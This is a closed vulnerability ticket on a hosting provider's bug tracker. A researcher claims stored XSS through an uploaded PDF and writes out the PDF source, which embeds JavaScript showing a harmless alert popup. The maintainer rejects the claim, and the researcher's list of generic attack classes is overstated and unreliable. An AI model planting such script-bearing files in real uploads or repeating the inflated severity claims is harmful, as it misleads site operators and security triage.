- Status Closed
-
Assigned To
cbay - Private
Opened by milapshah1 - 17.07.2024
Last edited by cbay - 17.07.2024
FS#63 - Stored XSS Via Upload Document
Vulnerability Explanation-When a user uploads a document containing malicious code, such as JavaScript, to the web application, it gets stored on the server without proper validation or sanitization. This allows an attacker to inject and execute arbitrary scripts within the application's context.
Impact-This vulnerability enables attackers to execute unauthorized scripts on the client-side, leading to session hijacking, data theft, or defacement of the web application. It can compromise user privacy, damage the application's reputation, and potentially expose sensitive information to malicious actors.
Severity-High
Steps to reproduce- 1) go to support https://admin.alwaysdata.com/support/
2) Open new ticket
3) upload this code as a.pdf (%PDF-1.3
%����
1 0 obj
«/Pages 2 0 R /Type /Catalog» endobj
2 0 obj
«/Count 1 /Kids [3 0 R] /Type /Pages» endobj
3 0 obj
«/AA
<</O <</JS (
try {
app.alert\("xss"\)
} catch \(e\) {
app.alert\(e.message\);
}
) /S /JavaScript>>>> /Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R /Resources <</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>> /Type /Page>>
endobj
4 0 obj
«/Length 21» stream
BT
/F1 24 Tf
ET
endstream
endobj
xref
0 5
0000000000 65535 f
0000000015 00000 n
0000000062 00000 n
0000000117 00000 n
0000000424 00000 n
trailer
«/Root 1 0 R /Size 5» startxref
493
%%EOF)
4) upload this file
5)Open this ticket
6) click on ulpaded malicious pdf file it will refelct
Loading...
Available keyboard shortcuts
- Alt + ⇧ Shift + l Login Dialog / Logout
- Alt + ⇧ Shift + a Add new task
- Alt + ⇧ Shift + m My searches
- Alt + ⇧ Shift + t focus taskid search
Tasklist
- o open selected task
- j move cursor down
- k move cursor up
Task Details
- n Next task
- p Previous task
- Alt + ⇧ Shift + e ↵ Enter Edit this task
- Alt + ⇧ Shift + w watch task
- Alt + ⇧ Shift + y Close Task
Task Editing
- Alt + ⇧ Shift + s save task
Hello,
As far as I know, malicious PDF files cannot do harm when viewed in a browser. Please upload a video of your PoC.
Kind regards,
Cyril
how can i uplod poc video , i did not is any attachment
There's a "Attach a file (max. 256 MiB)" button near the "Add comment" button.
i am able to see only 2 button add link and add comment.
i have attached poc video of google drive link – also answer to your first coomment This can lead to several types of attacks and escalations, including:
Cross-Site Scripting (XSS) Attacks: If the uploaded file contains JavaScript or other executable code, an attacker can craft malicious scripts that get executed in the context of other users' sessions when they access the uploaded content.
Server-Side Code Execution: Depending on how the application processes uploaded files, an attacker might be able to upload a file that contains server-side code (e.g., PHP, Python scripts). This could lead to remote code execution (RCE), where the attacker gains control over the server or the application's backend systems.
File Inclusion Attacks: If the application allows the inclusion of uploaded files in other parts of the application (e.g., including uploaded files as part of dynamically generated content), an attacker could manipulate this to include files containing malicious code, leading to further exploitation.
Data Injection Attacks: Beyond code execution, uploaded files could also be used to inject malicious data into the application's database or other storage systems, potentially compromising data integrity and confidentiality.
Denial of Service (DoS) Attacks: Large or specially crafted files could consume excessive server resources, leading to a denial of service for legitimate users.
https://drive.google.com/file/d/1NqHZ343Pkvx4HuhikeOLaoocWKRGN2UW/view?ts=6697b4b0
Oh sorry, adding attachments is only available for admins.
You can put your file anywhere you want, for instance on your own alwaysdata account.
Thanks for the quick response i have attached poc link in above drive link
Showing a popup is not a vulnerability. As far as I know, you can't steal anything with a malicious PDF.
Hi cbay, stored xss behave like this only.also for your refrence i am sharing hackerone report .https://hackerone.com/reports/683792
That HackerOne report is totally different: it's a real XSS, nothing to do with PDF.
I am a security researcher. Unfortunately, I prefer not to discuss this issue further. For your reference, I am attaching the OWASP reference related to this matter. It's unfortunate that I've spent time arguing with you and you still haven't understood the points mentioned in the HackerOne report. Thank you for your response. Have a good day.https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html